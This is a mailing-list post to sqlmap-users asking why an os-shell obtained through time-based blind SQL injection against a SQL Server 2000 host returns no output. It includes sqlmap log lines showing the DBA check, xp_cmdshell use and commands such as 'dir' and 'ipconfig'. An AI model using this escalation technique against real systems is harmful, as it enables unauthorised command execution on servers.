Hi All

I have a time-based blind injection on a machine running Windows Server
2003, IIS 6 and SQL Server 2000.  The user is running as DBA.  I should be
able to enable xp_cmdshell, and indeed:

[13:10:12] [INFO] testing if current user is DBA
[13:10:12] [INFO] retrieved: 1
[13:10:29] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[13:10:40] [INFO] xp_cmdshell extended procedure is available
[13:10:41] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[13:10:41] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a]
[13:10:53] [INFO] retrieved:
No output
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a]
[13:11:11] [INFO] retrieved:
No output
os-shell> exit
[13:31:24] [INFO] cleaning up the database management system
[13:31:26] [INFO] Fetched data logged to text files under...

As you can see, no output is returned (is this because of the injection
type I wonder?).

I've tried the various out of bounds methods with BT and msf too, but this
seems to fail at various stages.

Could it be that the database server is separate from the web server and is
totally isolated from the outside world by egress rules?

I'm trying to understand why in this case nothing seems to be working.

Any ideas would be great.

Regards

Chris
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
